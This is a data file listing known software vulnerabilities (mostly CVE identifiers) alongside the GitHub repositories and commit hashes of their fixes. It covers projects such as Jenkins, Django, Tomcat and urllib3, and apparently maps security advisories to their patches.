-CVE-2019-10310;https://github.com/jenkinsci/ansible-tower-plugin;None:None;False;b63a047281c2389217c9404f2f4bd4c9e66364fe; -CVE-2016-6581;https://github.com/python-hyper/hpack;None:None;False;4529c1632a356cc1ab6a7fdddccd2de60a21e366; -CVE-2018-1000008;https://github.com/jenkinsci/pmd-plugin;None:None;False;f88399a021c22e30cb8fbac5200471d69f1b6224; -CVE-2021-20178;https://github.com/ansible/ansible;None:None;False;0785772a03470fd2879d2f613520284997dc9dd0; -CVE-2019-1010083;https://github.com/pallets/flask;None:None;False;465b48ed4e4af52493df1febe4687f53032a5e0a; -CVE-2014-7810;https://github.com/apache/tomcat80;None:None;False;ab4ed90487795c9d9e2f9c63f9e1520e90a77104; -CVE-2019-1003049;https://github.com/jenkinsci/jenkins;None:None;False;0eeaa087aac192fb39f52928be5a5bbf16627ea6; -CVE-2019-3828;https://github.com/sivel/ansible;None:None;False;4be3215d2f9f84ca283895879f0c6ce1ed7dd33; -CVE-2020-15720;https://github.com/dogtagpki/pki;None:None;False;50c23ec146ee9abf28c9de87a5f7787d495f0b72; -CVE-2016-6637;https://github.com/cloudfoundry/uaa;None:None;False;32569285018a464dcbd9d4c120a11cc4b767f8e; -CVE-2019-18933;https://github.com/zulip/zulip;None:None;False;0c2cc41d2e40807baa5ee2c72987ebfb64ea2eb6; -CVE-2018-1000125;https://github.com/inversoft/prime-jwt;None:None;False;0d94dcef0133d699f21d217e922564adbb83a227; -CVE-2015-5211;https://github.com/spring-projects/spring-framework.git;None:None;False;a95c3d820dbc4c3ae752f1b3ee22ee860b162402; -DJOSER-001;https://github.com/sunscrapers/djoser;None:None;False;73b84926d9566df12d48245b06c5d5c986bbb272; -CVE-2020-7471;https://github.com/django/django;None:None;False;001b0634cd309e372edb6d7d95d083d02b8e37b,505826b469b16ab36693360da9e11fd13213421,c67a368c16e4680b324b4f385398d638db4d814,eb31d845323618d688ad429479c6dda97305613; -CVE-2020-13940;https://github.com/apache/nifi;None:None;False;7f0416ee8bdcee95e28409cc6fae9c1394c2a798; -CVE-2014-9601;https://github.com/wiredfool/Pillow;None:None;False;0b75526ffe41a4697231beb8b5740617c98f290b,44286ba3c9bfa6ed565d11bd61460d8ec215e1ea; -NIFI-4436;https://github.com/apache/nifi;None:None;False;0127b02617530491a1a55aa72395cee583083956,b6117743d4c1c1a37a16ba746b9edbbdd276d69f; -CVE-2014-1938;https://github.com/alex/rply;None:None;False;76d268a38c627bf4aebebcd064f5b6d380eb8b20; -CVE-2021-26296;https://github.com/apache/myfaces;None:None;False;b1b3d5486af4f9a4fa89ea433a5476bde8f92b1f; -CVE-2018-1000865;https://github.com/jenkinsci/groovy-sandbox;None:None;False;0cd7ec12b7c56cfa3167d99c5f43147ce05449d3; -CVE-2020-4071;https://github.com/tm-kn/django-basic-auth-ip-whitelist;None:None;False;106237b3736981a9d10fd9c8859a1bd46117e822; -CVE-2019-6802;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6; -CVE-2015-0250;https://github.com/apache/batik;None:None;False;efebce3f0ad33ede916a148b84d75749aea38349; -MTPROTOPROXY-001;https://github.com/alexbers/mtprotoproxy;None:None;False;372861ac6e3dd3d1d4996282f0905c36c5163fba; -CVE-2019-9658;https://github.com/checkstyle/checkstyle;None:None;False;180b4fe37a2249d4489d584505f2b7b3ab162ec6; -CVE-2020-5428;https://github.com/spring-cloud/spring-cloud-task;None:None;False;704b8df2ada20c349d5919d1dd5ee5bade4b96e8; -PYTHON3-SAML-001;https://github.com/onelogin/python3-saml;None:None;False;61eacb44d5789bd96edd11309a2bcae66e0d725f; -CVE-2018-1000656;https://github.com/pallets/flask;None:None;False;ab4142215d836b0298fc47fa1e4b75408b9c37a0; -CVE-2019-1003031;https://github.com/jenkinsci/matrix-project-plugin;None:None;False;765fc39694b31f8dd6e3d27cf51d1708b5df2be7; -CVE-2019-10449;https://github.com/jenkinsci/fortify-on-demand-uploader-plugin;None:None;False;b0ad5e4e8fc49361e73d4974ef77024bba00be5d; -CVE-2020-25689;https://github.com/wildfly/wildfly-core;None:None;False;5a8a65c2e3310fe0c0143581c677855516148215; -CVE-2014-1858;https://github.com/numpy/numpy;None:None;False;0bb46c1448b0d3f5453d5182a17ea7ac5854ee15; -CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1; -CVE-2018-16165;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; -CVE-2018-8013;https://github.com/apache/batik;None:None;False;f91125b26a6ca2b7a1195f1842360bed03629839; -CVE-2019-12300;https://github.com/buildbot/buildbot;None:None;False;51339c9e29850094d8b213d9a6eb4bee8e02563; -CVE-2017-4974;https://github.com/cloudfoundry/uaa;None:None;False;5dc5ca9176ed5baa870680d99f37e7e559dddc5; -HADOOP-12001;https://github.com/apache/hadoop;None:None;False;98f9d6fee112d95aab680fc7f27b815b2e698a5; -CVE-2018-1000164;https://github.com/benoitc/gunicorn;None:None;False;1e10a02e73c87dfadc394b361af33864d0e59e24; -CVE-2020-35460;https://github.com/joniles/mpxj;None:None;False;8eaf4225048ea5ba7e59ef4556dab2098fcc4a1d; -CVE-2017-12614;https://github.com/apache/incubator-airflow;None:None;False;8f9bf94d82abc59336e642db64e575cee0cc5df0; -CVE-2017-1000503;https://github.com/jenkinsci/jenkins;None:None;False;9b39411b1ae07ce8bf6c7df457bde1c6dabba9f; -CVE-2019-1003000;https://github.com/jenkinsci/jenkins;None:None;False;fa832c58b06556d9d3e0224be28f9c8673f3230b; -CVE-2012-5783;https://github.com/apache/httpcomponents-client;None:None;False;e9f86cb2507e6df8faf664cae39172ae865f1a01; -CVE-2017-15717;https://github.com/apache/sling-org-apache-sling-xss;None:None;False;ec6764d165abc4df8cffd8439761bb2228887db9; -CVE-2019-10352;https://github.com/jenkinsci/jenkins;None:None;False;18fc7c0b466553cbd4f790db3270964305bee7f9; -CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; -CVE-2017-12794;https://github.com/django/django;None:None;False;e35a0c56086924f331e9422daa266e907a4784c; -CVE-2014-2068;https://github.com/jenkinsci/jenkins.git;None:None;False;0530a6645aac10fec005614211660e98db44b5eb; -CVE-2020-25659;https://github.com/pyca/cryptography;None:None;False;58494b41d6ecb0f56b7c5f05d5f5e3ca0320d494; -CVE-2016-9015;https://github.com/Lukasa/urllib3;None:None;False;5e36a7096455ea94fb28b623d64e1f1bad97f82; -CVE-2012-4431;https://github.com/apache/tomcat;None:None;False;bd325e29762ca3f7a0801907bfbe5471effbbfff; -CVE-2019-13177;https://github.com/apragacz/django-rest-registration;None:None;False;26d094fab65ea8c2694fdfb6a3ab95a7808b62d5; -WERKZEUG-001;https://github.com/pallets/werkzeug;None:None;False;84eabcaa81f60d47939ac2d43f01d01eeab598a4; -CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; -CVE-2019-10339;https://github.com/jenkinsci/jx-resources-plugin;None:None;False;f0d9fb76230b65e851095da936a439d953c5f64d; -SPARK-981;https://github.com/perwendel/spark;None:None;False;030e9d00125cbd1ad759668f85488aba1019c668; -CVE-2017-9096-2;https://github.com/itext/itextpdf;None:None;False;ad38371c396ac5ffbfb28056809e8ffaa5a18ccd; -PYPISERVER-001;https://github.com/pypiserver/pypiserver;None:None;False;1375a67c55a9b8d4619df30d2a1c0b239d7357e6; -CVE-2019-0187;https://github.com/apache/jmeter;None:None;False;a82907030db158e00d681dc5f5330085951535f3; -CVE-2011-1088;https://github.com/apache/tomcat;None:None;False;880b1a4fc424625b56c8bcd9ebf6bfe966a1dadd,3ac2b5c1611af51ee5438fd32a3254a2de1878ce,f528992ec6cd7b62c9ced5b3a7dc4cda6bfd1a5e,02780bbc6089a12b19d3d5e5dc810455ac6bfe92,9c90bdc1ad942374b1bb6b147613497970b3c8e1; -S2-028;https://github.com/apache/struts;None:None;False;5421930b49822606792f36653b17d3d95ef106f9,72471d7075681bea52046645ad7aa34e9c53751e,a89bbe22cd2461748d595a89a254de888a415e6c; -CVE-2018-1999040;https://github.com/jenkinsci/kubernetes-plugin;None:None;False;bf7a47847dfb5ef2d1e2a537e2eb9f28063988c6; -CVE-2013-5123;https://github.com/dstufft/pip;None:None;False;3ef4ee4693db5e255dcfef1acf73427f6c97646b; -CVE-2019-18213;https://github.com/angelozerr/lsp4xml;None:None;False;d172c4daff4c0229493c62812a40be8357584f7b; -CVE-2013-2186;https://github.com/apache/commons-fileupload;None:None;False;163a6061fbc077d4b6e4787d26857c2baba495d1; -CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;29ff0838a40f58efe30a4bbcea95aa8dab7da475; -CVE-2020-8492;https://github.com/python/cpython;None:None;False;69cdeeb93e0830004a495ed854022425b93b3f3,b57a73694e26e8b2391731b5ee0b1be59437388,ea9e240aa02372440be8024acb110371f69c9d4; -CVE-2015-5081;https://github.com/divio/django-cms;None:None;False;f77cbc607d6e2a62e63287d37ad320109a2cc78a; -CVE-2017-1000387;https://github.com/jenkinsci/build-publisher-plugin;None:None;False;7f80f0d7c9cd96a2d660eeb8b695297bef064059,e9c1b263400e42aaa3f9fcbbd0e8b1e85c76e3a0; -CVE-2017-5664;https://github.com/apache/tomcat;None:None;False;29893e66111d33cfe99dd01cb146317c0c262ef4,25d3c0d93190ef165ecd6c744bc15b5059abfa8f,58b32048ce25cb812ae394dafb0cd57254c68155,4545dcce444aa619374a659cb450dbbd0be3c921,3242efea525df01d15da6e90ea69a9a21b10b454,e070a31ec81b56377822e44883c64abb41f36a3b,3bfe9fb886598c4d8ecbe674216152006bbce456,7d93527254d9e9371b342800617f20d13c8b85ad; -PT-2013-65;https://github.com/eclipse/jetty.project;None:None;False;0fac295cd82b59085d4aae5ca6792b2cda752455,458e511ce2f2b47fd216f68c0e385fc06a5f1d2f; -CVE-2019-12855;https://github.com/twisted/twisted;None:None;False;488bdd0b80cd1084359e34b8d36ae536520b1f86; -CVE-2010-4172;https://github.com/apache/tomcat;None:None;False;b328ce28c02ea79b5315c6ead8995ee993541430; -CVE-2020-26282;https://github.com/browserup/browserup-proxy;None:None;False;4b38e7a3e20917e5c3329d0d4e9590bed9d578ab; -CVE-2021-20228;https://github.com/ansible/ansible;None:None;False;e41d1f0a3fd6c466192e7e24accd3d1c6501111b; -CVE-2017-11427-PY3;https://github.com/onelogin/python3-saml;None:None;False;349757d98f0b7feaee867826a0782df4307fc32e; -CVE-2018-1000420;https://github.com/jenkinsci/mesos-plugin;None:None;False;e7e6397e30a612254e6033b94c21edb2324d648f; -CVE-2020-9491;https://github.com/apache/nifi;None:None;False;441781cec50f77d9f1e65093f55bbd614b8c5ec6; -CVE-2018-7206;https://github.com/jupyterhub/oauthenticator;None:None;False;1845c0e4b1bff3462c91c3108c85205acd3c75a; -CVE-2019-1003023;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;58d4cd85a7fc68ded989b6019c8c0cba3a457d15; -CVE-2018-7753;https://github.com/mozilla/bleach;None:None;False;c5df5789ec3471a31311f42c2d19fc2cf21b35ef; -CVE-2016-8747;https://github.com/apache/tomcat;None:None;False;452c8094a665ef6375530e81c033da4eeb2e4865,9601a937ff3b7ef5d04b2a0e950d0e44e1bb4cbd; -COLLECTIONS-580;https://github.com/apache/commons-collections;None:None;False;d9a00134f16d685bea11b2b12de824845e6473e3,e585cd0433ae4cfbc56e58572b9869bd0c86b611,da1a5fe00d79e1840b7e52317933e9eb56e88246,3eee44cf63b1ebb0da6925e98b3dcc6ef1e4d610,1642b00d67b96de87cad44223efb9ab5b4fb7be5,5ec476b0b756852db865b2e442180f091f8209ee,bce4d022f27a723fa0e0b7484dcbf0afa2dd210a; -JAVAMELODY-252;https://github.com/javamelody/javamelody;None:None;False;00ff3490878e78f3f8c9eb65efb054f85f6058f8; -CVE-2019-10428;https://github.com/jenkinsci/aqua-security-scanner-plugin;None:None;False;809fb7b12128eb22dbcdc4b7209465c105469833; -CVE-2018-1000111;https://github.com/jenkinsci/subversion-plugin;None:None;False;25f6afbb02a5863f363b0a2f664ac717ace743b4; -CVE-2018-15560;https://github.com/Legrandin/pycryptodome;None:None;False;d1739c62b9b845f8a5b342de08d6bf6e2722d247; -CVE-2018-20060;https://github.com/urllib3/urllib3;None:None;False;48dba048081dfcb999afcda715d17147aa15b6ea,9c9dd6f3014e89bb9c532b641abcf1b24c3896ab,f99912beeaf230ee3634b938d3ea426ffd1f3e57,2a42e70ff077006d5a6da92251ddbb2939303f94,3b5f27449e153ad05186beca8fbd9b134936fe50,3d7f98b07b6e6e04c2e89cdf5afb18024a2d804c,560bd227b90f74417ffaedebf5f8d05a8ee4f532,6245ddddb7f80740c5c15e1750e5b9f68c5b2b5f,63948f3a607ed8e7a3ce9ac4e20782359896e27e; -CVE-2018-1000519;https://github.com/aio-libs/aiohttp-session;None:None;False;6b7864004d3442dbcfaf8687f63262c1c629f569; -CVE-2016-3092-FU;https://github.com/apache/commons-fileupload;None:None;False;774ef160d591b579f703c694002e080f99bcd28b; -CVE-2014-3574;https://github.com/apache/poi;None:None;False;526abfe065b91c8baa02fd92918604e024764b82,69015a079eeb351c95c9aed6da03a0647f664dac,22aec7b4e363f61e39cc38bde84648c37003446f,6d1b0291c52c70486c25a18db4de962472910d64; -CVE-2020-15105;https://github.com/Bouke/django-two-factor-auth;None:None;False;454fd9842fa6e8bb772dbf0943976bc8e3335359; -APACHE-HTTPCLIENT-1976;https://github.com/apache/httpcomponents-client;None:None;False;c8068487fb65ba8ba3f3c74d7da101fc118b8b43; -CVE-2017-5934;https://github.com/moinwiki/moin-1.9;None:None;False;70955a8eae091cc88fd9a6e510177e70289ec024; -CVE-2020-27197;https://github.com/TAXIIProject/libtaxii;None:None;False;23c6f7b69d99e965c8d53dc4710ae64da3fb4842; -CVE-2019-1003032;https://github.com/jenkinsci/email-ext-plugin;None:None;False;53776779d3dba539facc7e3380c22671b71aad3e; -CVE-2020-15170;https://github.com/ctripcorp/apollo;None:None;False;1e61c3867d7f9f1f2d2e1b38ff6a1d9e784a9d18; -CVE-2016-2175;https://github.com/apache/pdfbox;None:None;False;6eb3ad2627d2cc7527bb3327370fa09e31907235; -CVE-2019-3559;https://github.com/facebook/fbthrift;None:None;False;a56346ceacad28bf470017a6bda1d5518d0bd943; -CVE-2019-10345;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;73afe3cb10a723cb06e29c2e5499206aadae3a0d; -CVE-2015-3162;https://github.com/beaker-project/beaker;None:None;False;36809a80741d572af124f2a15b1fdf5c581cde46; -CVE-2018-7750;https://github.com/paramiko/paramiko;None:None;False;fa29bd8446c8eab237f5187d28787727b4610516; -JETTY-1042;https://github.com/eclipse/jetty.project;None:None;False;02dd1975ec61052cb9a17342c9bbec289257b701; -CVE-2019-14859;https://github.com/warner/python-ecdsa;None:None;False;434f5dba086995e17dddd8df06007aa5e5dd9dad; -CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; -CVE-2020-11988;https://github.com/apache/xmlgraphics-commons;None:None;False;57393912eb87b994c7fed39ddf30fb778a275183; -CVE-2018-1000089;https://github.com/jenkinsci/pipeline-build-step-plugin;None:None;False;3dfefdec1f7b2a4ee0ef8902afdea720b1572cb3; -CVE-2017-5200;https://github.com/saltstack/salt;None:None;False;c59ae9a82cd600859b76809aeb14367f86abaf0e; -CVE-2019-10141;https://github.com/openstack/ironic-inspector;None:None;False;9d107900b2e0b599397b84409580d46e0ed16291; -HADOOP-14833;https://github.com/apache/hadoop;None:None;False;87f63b6479330840e9d708a729355948bb91fd4d; -CVE-2019-16328;https://github.com/tomerfiliba/rpyc;None:None;False;fc3b0b007847385fc83ddd287b5e6bc7a5ea51a2; -FLASK-IPBAN-001;https://github.com/Martlark/flask-ipban;None:None;False;7ab2820a2dcac4f7602a5fc2bd3f07f701203076; -CVE-2019-1003019;https://github.com/jenkinsci/github-oauth-plugin;None:None;False;3fcc367022c58486e5f52def3edbac92ed258ba4; -CVE-2020-29651;https://github.com/pytest-dev/py;None:None;False;4a9017dc6199d2a564b6e4b0aa39d6d8870e4144; -CVE-2017-1000398;https://github.com/jenkinsci/jenkins;None:None;False;da06fd471cea79123821c778228eeb08e1cedcc7; -CVE-2019-10461;https://github.com/jenkinsci/dynatrace-plugin;None:None;False;373adaa1161d59ccd4e5e3469a9b6aeec17968ae; -CVE-2017-11610;https://github.com/Supervisor/supervisor;None:None;False;058f46141e346b18dee0497ba11203cb81ecb19; -CVE-2016-5007-SEC;https://github.com/spring-projects/spring-security.git;None:None;False;e4c13e3c0ee7f06f59d3b43ca6734215ad7d8974; -CVE-2018-1192;https://github.com/cloudfoundry/uaa;None:None;False;a61bfabbad22f646ecf1f00016b448b26a60daf; -CVE-2018-1000518;https://github.com/tornadoweb/tornado;None:None;False;7bd3ef349214843141c0f1c3286ee8ad5e98aac3; -CVE-2018-1000407;https://github.com/jenkinsci/jenkins;None:None;False;df87e12ddcfeafdba6e0de0e07b3e21f8473ece6; -CVE-2018-1000055;https://github.com/jenkinsci/android-lint-plugin;None:None;False;4a19f962ebde3f705880b0e8148731d8dac9db2d; -CVE-2018-18074;https://github.com/requests/requests;None:None;False;c45d7c49ea75133e52ab22a8e9e13173938e36ff; -CVE-2019-19844;https://github.com/django/django;None:None;False;302a4ff1e8b1c798aab97673909c7a3dfda42c2,4d334bea06cac63dc1272abcec545b85136cca0,f4cff43bf921fcea6a29b726eb66767f67753fa; -CVE-2019-10338;https://github.com/jenkinsci/jx-resources-plugin;None:None;False;f0d9fb76230b65e851095da936a439d953c5f64d; -CVE-2019-16539;https://github.com/jenkinsci/support-core-plugin;None:None;False;6b177ea7cc7347e13fa87174472400bbbe78d422; -CVE-2020-13867;https://github.com/open-iscsi/targetcli-fb;None:None;False;493b62ee9e2b1d827d2faad8c77de6a89c7e21a9; -CVE-2019-10325;https://github.com/jenkinsci/warnings-ng-plugin;None:None;False;0b0016b5f32547c4e2f722aeb2243b4ea2e3be8b; -CVE-2018-12036;https://github.com/jeremylong/DependencyCheck;None:None;False;c106ca919aa343b95cca0ffff0a0b5dc20b2baf7; -CVE-2020-9492;https://github.com/apache/hadoop;None:None;False;2c70c0f74c7915380e5bfb3a79ef5713e854f8e,53ae2f9273ea014fe5d71c46c452fb64dbbd69c,ba66f3b454a5f6ea84f2cf7ac0082c555e2954a,e9cf454ac2c713e94ec92a74e9fd9959555052e,28715b584ab25dedc600cc2d5d22866865026bf; -CVE-2019-10328;https://github.com/jenkinsci/workflow-remote-loader-plugin;None:None;False;6f9d60f614359720ec98e22b80ba15e8bf88e712; -CVE-2019-10396;https://github.com/jenkinsci/dashboard-view-plugin;None:None;False;115238da2a8899358b32ee14e7076df23747d6c9; -CVE-2013-0158;https://github.com/jenkinsci/jenkins.git;None:None;False;a9aff088f327278a8873aef47fa8f80d3c5932fd,c3d8e05a1b3d58b6c4dcff97394cb3a79608b4b2,3dc13b957b14cec649036e8dd517f0f9cb21fb04,4895eaafca468b7f0f1a3166b2fca7414f0d5da5,94a8789b699132dd706021a6be1b78bc47f19602; -DJANGO-CA-001;https://github.com/mathiasertl/django-ca;None:None;False;d19009faecbad3f8a95f8a66a8fe3cfce14d14ce; -CVE-2014-2062;https://github.com/jenkinsci/jenkins.git;None:None;False;5548b5220cfd496831b5721124189ff18fbb12a3; -CVE-2018-7749;https://github.com/ronf/asyncssh;None:None;False;16e6ebfa893167c7d9d3f6dc7a2c0d197e47f43a; -OIC-363;https://github.com/schlenk/pyoidc;None:None;False;b9279ae488500fb669e9a46324adee21040692f5,eee497ccec8219321dddcf5b7aaa4fa0334d397a; -CVE-2018-1000408;https://github.com/jenkinsci/jenkins;None:None;False;01157a699f611ca7492e872103ac01526a982cf2; -CVE-2018-1000106;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;a222f2d9d1bca3422e6a462a7f587ae325455b80; -CVE-2021-25329;https://github.com/apache/tomcat;None:None;False;74b105657ffbd1d1de80455f03446c3bbf30d1f,93f0cc403a9210d469afc2bd9cf03ab3251c6f3,4785433a226a20df6acbea49296e1ce7e23de45,6d66e99ef85da93e4d2c2a536ca51aa3418bfaf; -CVE-2020-15271;https://github.com/d0c-s4vage/lookatme;None:None;False;72fe36b784b234548d49dae60b840c37f0eb8d84; -CVE-2018-1000159;https://github.com/tomato42/tlslite-ng;None:None;False;3674815d1b0f7484454995e2737a352e0a6a93d8; -CVE-2019-1003036;https://github.com/jenkinsci/azure-vm-agents-plugin;None:None;False;6cf1e11778993988ded08eb15ea051541341ec12; -CVE-2019-10160;https://github.com/python/cpython;None:None;False;f61599b050c621386a3fc6bc480359e2d3bb93d; -CVE-2020-29456;https://github.com/ciur/papermerge;None:None;False;e1aedd305e9b66935a9195e6de1a0eaeb3aedda8; -CVE-2019-1003085;https://github.com/jenkinsci/zephyr-enterprise-test-management-plugin;None:None;False;a2a698660c12d78e06f78c813c3ff10b4c30db16; -CVE-2013-7251;https://github.com/micromata/projectforge-webapp.git;None:None;False;422de35e3c3141e418a73bfb39b430d5fd74077e; -CVE-2020-11093;https://github.com/hyperledger/indy-node;None:None;False;55056f22c83b7c3520488b615e1577e0f895d75a; -CVE-2013-4155;https://github.com/openstack/swift;None:None;False;6b9806e0e8cbec60c0a3ece0bd516e0502827515; -CVE-2018-1000421;https://github.com/jenkinsci/mesos-plugin;None:None;False;e7e6397e30a612254e6033b94c21edb2324d648f; -CVE-2021-23926;https://github.com/apache/xmlbeans;None:None;False;a2604e07eeb04bd9a88f8624c3b8efd57b88237c,80cb805eb1488ba3a16c427866fa8ae1f52ff0c5,88668f433776e9e795b54263455427d42a456f7f; -CVE-2018-1000872;https://github.com/OpenKMIP/PyKMIP;None:None;False;06c960236bcaf6717fc5cf66cf8b5179804c5a05; -CVE-2017-1000391;https://github.com/jenkinsci/jenkins;None:None;False;566a8ddb885f0bef9bc848e60455c0aabbf0c1d3; -CVE-2019-10359;https://github.com/jenkinsci/m2release-plugin;None:None;False;2f1117d011e1ef200f28bbb0c24bf918b89704b6; -CVE-2014-2065;https://github.com/jenkinsci/jenkins.git;None:None;False;a0b00508eeb74d7033dc4100eb382df4e8fa72e7; -CVE-2019-1003004;https://github.com/jenkinsci/jenkins;None:None;False;8c490d14c4ffe6162f6e97d25a66612330fe2ace,da135e7ecb72469c17a47640314e424e314269b0; -CVE-2015-7337;https://github.com/ipython/ipython;None:None;False;0a8096adf165e2465550bd5893d7e352544e596; -MAVEN-SHARED-UTILS-297;https://github.com/apache/maven-shared-utils;None:None;False;6798f3033c3c5144e52c5aa8e1be584ea97527d,f751e614c09df8de1a080dc1153931f3f68991c; -CVE-2020-26943;https://github.com/openstack/blazar-dashboard;None:None;False;ee10b2c5c195088ec14725b790c17289ad20ed6,168b4ae052480912fa6fdd2c77e16cd87152830,33c58438abf8221291d264db26a061279d4f22c,5c7608dfa24dc5a5a3f18af09d35e8ea8760aee,63e9c5d25617467016eea1dff0a34803c86b095; -CVE-2019-10318;https://github.com/jenkinsci/azure-ad-plugin;None:None;False;70983d1a6528847ccd6e7f124450c578c42d194f; -INDICO-2019-10-3;https://github.com/indico/indico;None:None;False;8000673a35386c163ef26084256a7dc3c7034af,ad41a47be6984430af6b81d75459cc2355339f7; -CVE-2019-10317;https://github.com/jenkinsci/sitemonitor-plugin;None:None;False;a7210254b4dc9df15115e94ec8dba62b1e86493a; -CVE-2015-8103;https://github.com/jenkinsci/jenkins;None:None;False;5bd9b55a2a3249939fd78c501b8959a804c1164b; -CVE-2019-10302;https://github.com/jenkinsci/jira-ext-plugin;None:None;False;e252f4084089e5cfb4c7bad389d3d20f3ec594fb; -CVE-2019-16548;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;1dfef77f37bf5c005ac02c1bd79e44289b4d7da9,aaf81996741c67229982f70b3eaa83894e035025; -CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a2697e7c6b275f05879b60f593c5854a816489f0; -CVE-2013-2233;https://github.com/ansible/ansible;None:None;False;c593454fd075fe4a2385bf88aaef054a0751a227,f782c237c486edc42076d4933739d45a6b42f0a2; -CVE-2015-1838;https://github.com/saltstack/salt;None:None;False;e11298d7155e9982749483ca5538e46090caef9c; -CVE-2019-1020006;https://github.com/inveniosoftware/invenio-app;None:None;False;0feb40ad3d879eb5b2201780add702a8808f147; -CVE-2019-1003024;https://github.com/jenkinsci/script-security-plugin;None:None;False;3228c88e84f0b2f24845b6466cae35617e082059; -CVE-2020-28493;https://github.com/pallets/jinja;None:None;False;ef658dc3b6389b091d608e710a810ce8b87995b3; -CVE-2017-16618;https://github.com/tadashi-aikawa/owlmixin;None:None;False;5d0575303f6df869a515ced4285f24ba721e0d4e; -CVE-2018-12537;https://github.com/eclipse/vert.x;None:None;False;1bb6445226c39a95e7d07ce3caaf56828e8aab72; -CVE-2020-25638;https://github.com/hibernate/hibernate-orm;None:None;False;59fede7acaaa1579b561407aefa582311f7ebe78; -CVE-2020-27218;https://github.com/eclipse/jetty.project;None:None;False;6c94ef5848abb1778a32161e5c085a5b195baf01; -CVE-2020-28473;https://github.com/bottlepy/bottle;None:None;False;57a2f22e0c1d2b328c4f54bf75741d74f47f1a6b; -CVE-2016-10127;https://github.com/rohe/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2014-1829;https://github.com/requests/requests;None:None;False;97cf16e958a948ecf30c3019ae94f2e7ec7dcb7f,f1893c835570d72823c970fbd6e0e42c13b1f0f2,fe4c4f146124d7fba2e680581a5d6b9d98e3fdf8,7ba5a534ae9fc24e40b3ae6c480c9075d684727e; -CVE-2020-25711;https://github.com/infinispan/infinispan;None:None;False;8dce81940cfef3d18057158112610ddb9493172c; -PRIMEFACES-1194;https://github.com/primefaces/primefaces;None:None;False;afcec249b82cad60978e8ecb3926822d3f51b25a,e8c0baae853c48bb1fb2d39833c5b2b6af837616; -CVE-2020-26217;https://github.com/x-stream/xstream;None:None;False;0fec095d534126931c99fd38e9c6d41f5c685c1a; -CVE-2020-11651;https://github.com/saltstack/salt;None:None;False;a67d76b15615983d467ed81371b38b4a17e4f3b,f47e4856497231eb672da2ce0df3e641581d47e,ffea7ffa215313f68b42f82984b0441e1017330; -CVE-2020-11987;https://github.com/apache/xmlgraphics-batik;None:None;False;0ef5b661a1f77772d1110877ea9e0287987098f6; -CVE-2018-1000009;https://github.com/jenkinsci/checkstyle-plugin;None:None;False;365d6164ebce7b65ae010c71016924ef8b98c1a0; -CVE-2019-16554;https://github.com/jenkinsci/build-failure-analyzer-plugin;None:None;False;f316c885552ac75289cbb11b2af5757f18784bcb; -CVE-2017-16616;https://github.com/Stranger6667/pyanyapi;None:None;False;810db626c18ebc261d5f4299d0f0eac38d5eb3cf; -CVE-2018-19351;https://github.com/jupyter/notebook;None:None;False;107a89fce5f413fb5728c1c5d2c7788e1fb17491; -CVE-2021-3137;https://github.com/xwiki/xwiki-commons;None:None;False;327fa15ba24c2152940f09e459d0fe934756dde4; -CVE-2014-9970;https://github.com/jboss-fuse/jasypt;None:None;False;8e62852a8018978ee19d39056c650fb66ffa0ff6; -CVE-2019-1020005;https://github.com/inveniosoftware/invenio-communities;None:None;False;505da72c5acd7dfbd4148f884c73c9c3372b76f4; -CVE-2016-3093;https://github.com/jkuhnert/ognl;None:None;False;ae43073fbf38db8371ff4f8bf2a966ee3b5f7e92; -CVE-2019-10353;https://github.com/jenkinsci/jenkins;None:None;False;772152315aa0a9ba27b812a4ba0f3f9b64af78d9; -CVE-2012-3546;https://github.com/apache/tomcat;None:None;False;f78c0cdfc8a3c2efdfe6df6b69e5e3daafa3f588; -CVE-2012-2098;https://github.com/apache/commons-compress;None:None;False;654222e628097763ee6ca561ae77be5c06666173,b06f7b41c936ef1a79589d16ea5c1d8b93f71f66,cca0e6e5341aacddefd4c4d36cef7cbdbc2a8777,020c03d8ef579e80511023fb46ece30e9c3dd27d,fdd7459bc5470e90024dbe762249166481cce769,0600296ab8f8a0bbdfedd483f51b38005eb8e34e,6ced422bf5eca3aac05396367bafb33ec21bf74e,8f702469cbf4c451b6dea349290bc4af0f6f76c7,6e95697e783767f3549f00d7d2e1b002eac4a3d4,1ce57d976c4f25fe99edcadf079840c278f3cb84; -CVE-2018-1000861;https://github.com/jenkinsci/jenkins;None:None;False;47f38d714c99e1841fb737ad1005618eb26ed852; -CVE-2018-1000805;https://github.com/paramiko/paramiko;None:None;False;56c96a659658acdbb873aef8809a7b508434dcce; -CVE-2021-22112;https://github.com/spring-projects/spring-security;None:None;False;c72a6fac04853912a4b7caad5f0500f2aace5a79; -CVE-2019-11278;https://github.com/cloudfoundry/uaa;None:None;False;dbbbe38fc5a2af35257b5a349b7cae5a5166df52; -CVE-2019-1003028;https://github.com/jenkinsci/jms-messaging-plugin;None:None;False;be87ad81c8b3aac6486ca787e3953c8fb6271997; -CVE-2018-1000862;https://github.com/jenkinsci/jenkins;None:None;False;c19cc705688cfffa4fe735e0edbe84862b6c135f; -CVE-2019-1003027;https://github.com/jenkinsci/octopusdeploy-plugin;None:None;False;40e04160ac77190a51c8e2c3164a0151441efdf4; -CVE-2020-28724;https://github.com/pallets/werkzeug;None:None;False;413a978fa99f64d2abdfb8bddd1da5bf44bc52ec; -CVE-2019-10341;https://github.com/jenkinsci/docker-plugin;None:None;False;6ad27199f6fad230be72fd45da78ddac85c075db; -CVE-2014-0074;https://github.com/apache/shiro;None:None;False;9137e6cc45922b529fb776c6857647a3935471bb; 